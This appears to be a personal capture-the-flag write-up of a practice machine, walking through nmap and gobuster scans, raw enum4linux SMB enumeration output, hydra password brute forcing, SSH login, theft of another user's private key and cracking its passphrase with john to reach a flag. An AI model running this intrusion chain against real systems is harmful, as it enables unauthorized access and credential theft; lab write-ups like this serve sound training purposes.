The purpose of this machine is to allow us to practice web app hacking and privilege escalation.
I start scanning ports through nmap, which tells me there are 6 ports open (22, 80, 139, 445, 8009, 8080).
guest@carattj
>> nmap -sC -sV -oN nmap_scan.txt [ip_address>]
# Nmap 7.92 scan initiated Sun Feb 27 08:49:39 2022 as: nmap -sC -sV -oN nmap/initial 10.10.30.5 Nmap scan report for 10.10.30.5 Host is up (0.11s latency). Not shown: 994 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA) | 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA) |_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: |_ Supported methods: GET HEAD POST OPTIONS 8080/tcp open http Apache Tomcat 9.0.7 |_http-favicon: Apache Tomcat |_http-open-proxy: Proxy might be redirecting requests |_http-title: Apache Tomcat/9.0.7 Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: -1s | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: basic2 | NetBIOS computer name: BASIC2\x00 | Domain name: \x00 | FQDN: basic2 |_ System time: 2022-02-27T08:49:52-05:00 |_nbstat: NetBIOS name: BASIC2, NetBIOS user:, NetBIOS MAC: (unknown) | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb2-time: | date: 2022-02-27T13:49:53 |_ start_date: N/A | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Feb 27 08:49:57 2022 -- 1 IP address (1 host up) scanned in 18.96 seconds
I see the http port 80 is open, then I open [ip_address]:80 in the browser, and I inspect the page using the developers tools. It is written that there could be hidden pages, therefore I brute force the domain using gobuster. We also have to provide a wordlist, luckily in Kali linux there are many of them.
guest@carattj
>> gobuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -o gobuster_scan.txt
/development (Status: 301) [Size: 314] [--> http://10.10.30.5/development/]
I found the hidden /development page, where we have access to an Apache/2.4.18 server. Here, we can view the two files dev.txt and j.txt. They tell me the system is probably using easy passwords.
On ports 139 and 445 SMB services are running, I enumerate them using enum4linnux, and I discover two usernames of the system are 'kay' and 'jan'.
guest@carattj
>> enum4linnux -a [ip_address]
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 27 12:01:30 2022 ========================== | Target Information | ========================== Target ........... 10.10.128.212 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ===================================================== | Enumerating Workgroup/Domain on 10.10.128.212 | ===================================================== [+] Got domain/workgroup name: WORKGROUP ============================================= | Nbtstat Information for 10.10.128.212 | ============================================= Looking up status of 10.10.128.212 BASIC2 <00> - BWorkstation Service BASIC2 <03> - B Messenger Service BASIC2 <20> - B File Server Service ..__MSBROWSE__. <01> - B Master Browser WORKGROUP <00> - B Domain/Workgroup Name WORKGROUP <1d> - B Master Browser WORKGROUP <1e> - B Browser Service Elections MAC Address = 00-00-00-00-00-00 ====================================== | Session Check on 10.10.128.212 | ====================================== [+] Server 10.10.128.212 allows sessions using username '', password '' ============================================ | Getting domain SID for 10.10.128.212 | ============================================ Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ======================================= | OS information on 10.10.128.212 | ======================================= [+] Got OS info for 10.10.128.212 from smbclient: [+] Got OS info for 10.10.128.212 from srvinfo: BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu platform_id : 500 os version : 6.1 server type : 0x809a03 ============================== | Users on 10.10.128.212 | ============================== ========================================== | Share Enumeration on 10.10.128.212 | ========================================== Sharename Type Comment --------- ---- ------- Anonymous Disk IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP BASIC2 [+] Attempting to map shares on 10.10.128.212 //10.10.128.212/Anonymous Mapping: OK, Listing: OK //10.10.128.212/IPC$ [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* ===================================================== | Password Policy Information for 10.10.128.212 | ===================================================== [+] Attaching to 10.10.128.212 using a NULL share [+] Trying protocol 139/SMB... [+] Found domain(s): [+] BASIC2 [+] Builtin [+] Password Info for Domain: BASIC2 [+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: 37 days 6 hours 21 minutes [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: 37 days 6 hours 21 minutes [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 =============================== | Groups on 10.10.128.212 | =============================== [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: ======================================================================== | Users on 10.10.128.212 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================== [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-5-32 and logon username '', password '' S-1-5-32-500 *unknown*\*unknown* (8) S-1-5-32-501 *unknown*\*unknown* (8) S-1-5-32-502 *unknown*\*unknown* (8) S-1-5-32-503 *unknown*\*unknown* (8) S-1-5-32-504 *unknown*\*unknown* (8) S-1-5-32-505 *unknown*\*unknown* (8) S-1-5-32-506 *unknown*\*unknown* (8) S-1-5-32-507 *unknown*\*unknown* (8) S-1-5-32-508 *unknown*\*unknown* (8) S-1-5-32-509 *unknown*\*unknown* (8) S-1-5-32-510 *unknown*\*unknown* (8) S-1-5-32-511 *unknown*\*unknown* (8) S-1-5-32-512 *unknown*\*unknown* (8) S-1-5-32-513 *unknown*\*unknown* (8) S-1-5-32-514 *unknown*\*unknown* (8) S-1-5-32-515 *unknown*\*unknown* (8) S-1-5-32-516 *unknown*\*unknown* (8) S-1-5-32-517 *unknown*\*unknown* (8) S-1-5-32-518 *unknown*\*unknown* (8) S-1-5-32-519 *unknown*\*unknown* (8) S-1-5-32-520 *unknown*\*unknown* (8) S-1-5-32-521 *unknown*\*unknown* (8) S-1-5-32-522 *unknown*\*unknown* (8) S-1-5-32-523 *unknown*\*unknown* (8) S-1-5-32-524 *unknown*\*unknown* (8) S-1-5-32-525 *unknown*\*unknown* (8) S-1-5-32-526 *unknown*\*unknown* (8) S-1-5-32-527 *unknown*\*unknown* (8) S-1-5-32-528 *unknown*\*unknown* (8) S-1-5-32-529 *unknown*\*unknown* (8) S-1-5-32-530 *unknown*\*unknown* (8) S-1-5-32-531 *unknown*\*unknown* (8) S-1-5-32-532 *unknown*\*unknown* (8) S-1-5-32-533 *unknown*\*unknown* (8) S-1-5-32-534 *unknown*\*unknown* (8) S-1-5-32-535 *unknown*\*unknown* (8) S-1-5-32-536 *unknown*\*unknown* (8) S-1-5-32-537 *unknown*\*unknown* (8) S-1-5-32-538 *unknown*\*unknown* (8) S-1-5-32-539 *unknown*\*unknown* (8) S-1-5-32-540 *unknown*\*unknown* (8) S-1-5-32-541 *unknown*\*unknown* (8) S-1-5-32-542 *unknown*\*unknown* (8) S-1-5-32-543 *unknown*\*unknown* (8) S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) S-1-5-32-1000 *unknown*\*unknown* (8) S-1-5-32-1001 *unknown*\*unknown* (8) S-1-5-32-1002 *unknown*\*unknown* (8) S-1-5-32-1003 *unknown*\*unknown* (8) S-1-5-32-1004 *unknown*\*unknown* (8) S-1-5-32-1005 *unknown*\*unknown* (8) S-1-5-32-1006 *unknown*\*unknown* (8) S-1-5-32-1007 *unknown*\*unknown* (8) S-1-5-32-1008 *unknown*\*unknown* (8) S-1-5-32-1009 *unknown*\*unknown* (8) S-1-5-32-1010 *unknown*\*unknown* (8) S-1-5-32-1011 *unknown*\*unknown* (8) S-1-5-32-1012 *unknown*\*unknown* (8) S-1-5-32-1013 *unknown*\*unknown* (8) S-1-5-32-1014 *unknown*\*unknown* (8) S-1-5-32-1015 *unknown*\*unknown* (8) S-1-5-32-1016 *unknown*\*unknown* (8) S-1-5-32-1017 *unknown*\*unknown* (8) S-1-5-32-1018 *unknown*\*unknown* (8) S-1-5-32-1019 *unknown*\*unknown* (8) S-1-5-32-1020 *unknown*\*unknown* (8) S-1-5-32-1021 *unknown*\*unknown* (8) S-1-5-32-1022 *unknown*\*unknown* (8) S-1-5-32-1023 *unknown*\*unknown* (8) S-1-5-32-1024 *unknown*\*unknown* (8) S-1-5-32-1025 *unknown*\*unknown* (8) S-1-5-32-1026 *unknown*\*unknown* (8) S-1-5-32-1027 *unknown*\*unknown* (8) S-1-5-32-1028 *unknown*\*unknown* (8) S-1-5-32-1029 *unknown*\*unknown* (8) S-1-5-32-1030 *unknown*\*unknown* (8) S-1-5-32-1031 *unknown*\*unknown* (8) S-1-5-32-1032 *unknown*\*unknown* (8) S-1-5-32-1033 *unknown*\*unknown* (8) S-1-5-32-1034 *unknown*\*unknown* (8) S-1-5-32-1035 *unknown*\*unknown* (8) S-1-5-32-1036 *unknown*\*unknown* (8) S-1-5-32-1037 *unknown*\*unknown* (8) S-1-5-32-1038 *unknown*\*unknown* (8) S-1-5-32-1039 *unknown*\*unknown* (8) S-1-5-32-1040 *unknown*\*unknown* (8) S-1-5-32-1041 *unknown*\*unknown* (8) S-1-5-32-1042 *unknown*\*unknown* (8) S-1-5-32-1043 *unknown*\*unknown* (8) S-1-5-32-1044 *unknown*\*unknown* (8) S-1-5-32-1045 *unknown*\*unknown* (8) S-1-5-32-1046 *unknown*\*unknown* (8) S-1-5-32-1047 *unknown*\*unknown* (8) S-1-5-32-1048 *unknown*\*unknown* (8) S-1-5-32-1049 *unknown*\*unknown* (8) S-1-5-32-1050 *unknown*\*unknown* (8) [+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password '' S-1-5-21-2853212168-2008227510-3551253869-500 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User) S-1-5-21-2853212168-2008227510-3551253869-502 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-503 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-504 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-505 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-506 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-507 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-508 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-509 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-510 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-511 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-512 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group) S-1-5-21-2853212168-2008227510-3551253869-514 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-515 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-516 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-517 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-518 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-519 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-520 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-521 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-522 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-523 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-524 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-525 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-526 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-527 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-528 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-529 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-530 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-531 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-532 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-533 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-534 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-535 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-536 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-537 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-538 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-539 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-540 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-541 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-542 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-543 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-544 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-545 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-546 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-547 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-548 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-549 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-550 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1000 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1001 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1002 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1003 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1004 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1005 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1006 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1007 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1008 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1009 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1010 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1011 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1012 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1013 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1014 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1015 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1016 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1017 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1018 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1019 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1020 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1021 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1022 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1023 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1024 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1025 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1026 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1027 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1028 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1029 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1030 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1031 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1032 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1033 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1034 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1035 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1036 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1037 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1038 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1039 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1040 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1041 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1042 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1043 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1044 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1045 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1046 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1047 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1048 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1049 *unknown*\*unknown* (8) S-1-5-21-2853212168-2008227510-3551253869-1050 *unknown*\*unknown* (8) [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\kay (Local User) S-1-22-1-1001 Unix User\jan (Local User) ============================================== | Getting printer info for 10.10.128.212 | ============================================== No printers returned. enum4linux complete on Sun Feb 27 12:05:01 2022
Now that I know two usernames, and the fact that there is an easy password protecting the system, I bruteforce the password. This time, I use hydra, providing a single user (-l), a list of passwords (-P), and the protocol I'm going to use. To use a list of users, I would have used -L, and a single password -p.
I get a match: the password of 'jay' is 'armando'.
I connect to the server and navigate through the filesystem.
guest@carattj
>> ssh jan@[ip_address]
...
Inside the .ssh directory, there are 3 interesting files related to ssh symmetric cryptography.
In particular, there is the private key of the second user, 'kay', stored inside id_rsa.
I copy id_rsa to my machine into k_key, and I change its permissions to later use it for ssh
connection.
To decode it, I use JohnTheRipper tool. I look for the converter for the key to a readable
hash, and use john to find the password:
guest@carattj
chmod 600 k_key
...
>> locate ssh2john python3 ssh2john.py k_key > k_key_john
...
>> john --wordlist=rockyou.txt k_key_john
...
The password for the ssh private key is 'beeswax'.
Finally, by knowing the password, I connect as 'kay' using ssh and providing the private key as
command line argument:
guest@carattj
ssh -i k_key kay@
...
Now, I can read the pass.bak file inside 'kay' home directory, that contains the password-flag to be captured.